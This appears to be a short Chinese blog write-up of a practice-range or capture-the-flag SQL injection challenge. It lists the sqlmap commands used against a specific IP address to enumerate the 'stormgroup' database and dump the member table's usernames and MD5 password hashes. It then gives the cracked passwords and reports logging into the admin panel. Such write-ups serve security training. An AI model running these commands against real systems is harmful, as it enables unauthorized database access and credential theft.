打开页面发现一个登录框。还有一个通知。

直接扔sqlmap里面跑

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1

然后开始爆裤

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 --dbs

接下来就是报表/字段/数据

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup --tables

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup -T member --columns

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup -T member -C name,password --dump

然后解码md5

3114b433dece9180717f2b7de56b28a3解(528469)

870a77a3bdc1ff88e85cdcc250d78857解(402315)

登录后台发现第一个被禁用,第二个登录成功

大概就这些。

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...